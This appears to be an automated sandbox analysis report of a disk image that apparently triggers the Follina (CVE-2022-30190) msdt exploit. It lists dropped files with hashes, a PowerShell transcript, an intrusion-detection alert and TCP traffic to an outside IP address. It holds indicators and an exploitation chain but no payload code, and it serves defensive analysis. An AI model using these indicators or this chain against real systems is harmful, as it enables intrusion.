                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Rl/ZdE2GHlmclWSRSLuRa4pL99l:RtZqkHSUIa+
                                                                                                                                                                    MD5:F5EEF03731758B35D82538F83E0D3469
                                                                                                                                                                    SHA1:53DE07E131F07113F83EC1D1F3E7B4BD7BC3483E
                                                                                                                                                                    SHA-256:F7F2EFEA3D45B034151A9C573176404DC88E18E1BA28D86387FB5C3F1916C97D
                                                                                                                                                                    SHA-512:D763F0667673EE9DD67AEB97F3AD0A77A0A647C3BA384F2144A3200581AF07BA47DA358F73D980D7F8936631F074E9A22A36B5374DF0F7FE78C7C927D2054D3C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.pratesh................................................p.r.a.t.e.s.h..........`...........{...................`.......}...}...}..............q`.......|...|...|..
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):20
                                                                                                                                                                    Entropy (8bit):2.8954618442383215
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                    MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                    SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                    SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                    SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..p.r.a.t.e.s.h.....
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1020
                                                                                                                                                                    Entropy (8bit):5.1299309249841665
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:BxSAhc7vBZ0x2DOXikR9uyeWjyHjeTKKjX4CIym1ZJXpxR9uy6nxSAZ6:BZh6vj0oOxjjyqDYB1ZvxOZZ6
                                                                                                                                                                    MD5:B9240629DC74189BF4659F00EA042651
                                                                                                                                                                    SHA1:4457AE6FAD21CEDC1A711A89912569E267D2C7FD
                                                                                                                                                                    SHA-256:44B367279577281597D08BAED307899B475E025E8EF9E1C2D3E52F4DB5CF9DA0
                                                                                                                                                                    SHA-512:F96D1F7E43A5D6575DEB73E9CE75027ACB295624CCD5585C7F20F41B62D5EE131655172A4DE273112AE1568ED7E44669D25A44CAE669A59938C795BFE2CCF4BF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220607192050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath C:\Users\user\Desktop\68101181_048154.img..Process ID: 6088..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220607192050..**********************..PS>Mount-DiskImage -ImagePath C:\Users\user\Desktop\68101181_048154.img..**********************..Command start time: 20220607192547..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220607192547..****
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):24702
                                                                                                                                                                    Entropy (8bit):4.37978533849437
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                    MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                    SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                    SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                    SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):66560
                                                                                                                                                                    Entropy (8bit):6.926109943059805
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                    MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                    SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                    SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                    SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                     Antivirus:
                                                                                                                                                                     • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                     • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):50242
                                                                                                                                                                    Entropy (8bit):4.932919499511673
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                    MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                    SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                    SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                    SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16946
                                                                                                                                                                    Entropy (8bit):4.860026903688885
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                    MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                    SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                    SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                    SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):453
                                                                                                                                                                    Entropy (8bit):4.983419443697541
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                    MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                    SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                    SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                    SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6650
                                                                                                                                                                    Entropy (8bit):3.6751460885012333
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                    MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                    SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                    SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                    SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):10752
                                                                                                                                                                    Entropy (8bit):3.517898352371806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                    MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                    SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                    SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                    SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):48956
                                                                                                                                                                    Entropy (8bit):5.103589775370961
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                    MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                    SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                    SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                    SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                    File type:data
                                                                                                                                                                    Entropy (8bit):4.388873348178114
                                                                                                                                                                    TrID:
                                                                                                                                                                    • null bytes (2050048/1) 99.34%
                                                                                                                                                                    • Photoshop Action (5010/6) 0.24%
                                                                                                                                                                    • Lotus 123 Worksheet (generic) (2007/4) 0.10%
                                                                                                                                                                    • HSC music composer song (1267/141) 0.06%
                                                                                                                                                                    • Game Music Creator Music (1131/43) 0.05%
                                                                                                                                                                    File name:68101181_048154.img
                                                                                                                                                                    File size:2686976
                                                                                                                                                                    MD5:a623c3499f992a05c4ee5b9b2d3858f8
                                                                                                                                                                    SHA1:ade8126beb9690929fd253686534b77a97ab4c44
                                                                                                                                                                    SHA256:c77c63b0ad713ca97776305af4b22cd934271fec00f3c8029bdbbfcf8cd1ed98
                                                                                                                                                                    SHA512:27dabe09827c8b81f1dc00063a57ffcb277eabe060299994f1bd5340d0a1b3d8f348dc53458b53bee44232958f3f1ec370a0ed126b2c7266b838f9a51b150ac2
                                                                                                                                                                    SSDEEP:24576:380Ra7rJwVXWqZLSPZF5BQjaM+R4YENZrfrzfQND6CJ0:3t8kRKZ29+I4NDLJ
                                                                                                                                                                    TLSH:4CC55C21B2CEC737D4F3277C8D6FB658946A7D111E38945A7BE40E4C0E3A6813A2D693
                                                                                                                                                                    File Content Preview:...............................................................................................................................................................................................................................................................
Timestamp                 Protocol  SID      Message                                                                                      Source Port  Dest Port  Source IP        Dest IP
06/07/22-19:21:17.785538  TCP       2036726  ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)  80           49762      185.234.247.119  192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jun 7, 2022 19:21:14.022562027 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:14.050025940 CEST  80           49761      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:14.050148010 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:14.123152971 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:14.150544882 CEST  80           49761      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:14.150614023 CEST  80           49761      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:14.354796886 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:14.453907967 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:14.481559992 CEST  80           49761      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:14.542310953 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.600215912 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.628205061 CEST  80           49761      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.725593090 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.753061056 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.753199100 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.757827997 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.785219908 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.785537958 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.785557032 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.785573006 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.785618067 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.785648108 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.785665035 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.785717964 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.785778046 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:17.785834074 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:17.855159044 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.104799032 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.132652044 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:18.132742882 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.607587099 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.635207891 CEST  80           49762      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:18.635379076 CEST  49762        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.721376896 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.748950005 CEST  80           49761      185.234.247.119  192.168.2.4
Jun 7, 2022 19:21:18.837891102 CEST  49761        80         192.168.2.4      185.234.247.119
Jun 7, 2022 19:21:18.865309000 CEST  80           49761      185.234.247.119  192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.925173044 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.952740908 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.952858925 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.963536978 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.991211891 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.991384983 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:19.042788982 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:19.215001106 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:19.242710114 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:19.242794991 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:28.708358049 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:28.736881971 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:28.736963034 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:23.866662979 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:23.866827011 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:23.866884947 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:23.895661116 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:33.736814976 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:33.736965895 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.019610882 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.047683954 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.047900915 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.049490929 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.077296019 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216723919 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216821909 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216876030 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216922998 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217030048 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.217058897 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217108965 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.217113018 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217155933 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217168093 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.217241049 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217291117 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217297077 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245073080 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245120049 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245152950 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245182991 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245203972 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245219946 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245223999 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245260954 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245285034 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245301008 CEST8049780185.234.247.119192.168.2.4
